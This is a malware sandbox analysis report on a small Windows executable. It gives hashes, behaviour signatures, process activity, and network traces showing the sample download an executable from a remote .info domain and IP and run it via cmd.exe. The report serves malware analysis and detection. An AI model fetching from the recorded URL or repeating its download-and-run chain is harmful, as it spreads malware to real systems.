Analysis
max time kernel: 122s
max time network: 127s
platform: windows7_x64
resource: win7-20230831-en
resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
submitted: 14/10/2023, 19:17 UTC
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
NEAS.dd38841a447bead5b8beabb267592510.exe
Resource
win7-20230831-en
1 signatures
150 seconds
Behavioral task
behavioral2
Sample
NEAS.dd38841a447bead5b8beabb267592510.exe
Resource
win10v2004-20230915-en
1 signatures
150 seconds
General
Target: NEAS.dd38841a447bead5b8beabb267592510.exe
Size: 5KB
MD5: dd38841a447bead5b8beabb267592510
SHA1: 6b14e1db4af724dc90d4ac4f1b448534b08c27f1
SHA256: ab7f93b129946c311d08f101414530ceafaa15365c06522264b29ac7e9512f28
SHA512: f2e2a39da93258570e9f28be0db4d3fc1510ae05f24ae6a3159509e4e90bcd9eb3c521a16558f46b6149c49d897da0c32a23871a8bbc22006181fab09ba5e6d5
SSDEEP: 48:6MjtHxWXZR/4plYRWhxeXzu6fvQJrONvTrg7GtGd9d/9orw2d03z:xtHwXZJ4plYRccjrfYJrO9Tr3aor
Score
1/10
Malware Config
Signatures
Suspicious use of WriteProcessMemory (3 IoCs)
description | pid | Process | procid_target
PID 1720 wrote to memory of 2664 | 1720 | NEAS.dd38841a447bead5b8beabb267592510.exe | 29
PID 1720 wrote to memory of 2664 | 1720 | NEAS.dd38841a447bead5b8beabb267592510.exe | 29
PID 1720 wrote to memory of 2664 | 1720 | NEAS.dd38841a447bead5b8beabb267592510.exe | 29
Processes
"C:\Users\Admin\AppData\Local\Temp\NEAS.dd38841a447bead5b8beabb267592510.exe" (PID: 1720)
- Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\20231015T091756_106.exe (PID: 2664)
Network
Remote address: 8.8.8.8:53
Request: 20231015t091756_106.ltiapmyzmjxrvrts.info IN A
Response: 20231015t091756_106.ltiapmyzmjxrvrts.info IN CNAME ltiapmyzmjxrvrts.info
Response: ltiapmyzmjxrvrts.info IN A 54.37.238.86

GET http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe
Process: NEAS.dd38841a447bead5b8beabb267592510.exe
Remote address: 54.37.238.86:80
Request:
GET /v4/20231015T091756_106.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 20231015t091756_106.ltiapmyzmjxrvrts.info
Connection: Keep-Alive

54.37.238.86:80 | http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe | http | NEAS.dd38841a447bead5b8beabb267592510.exe | 524 B | 92 B | 3 | 2
HTTP Request
GET http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe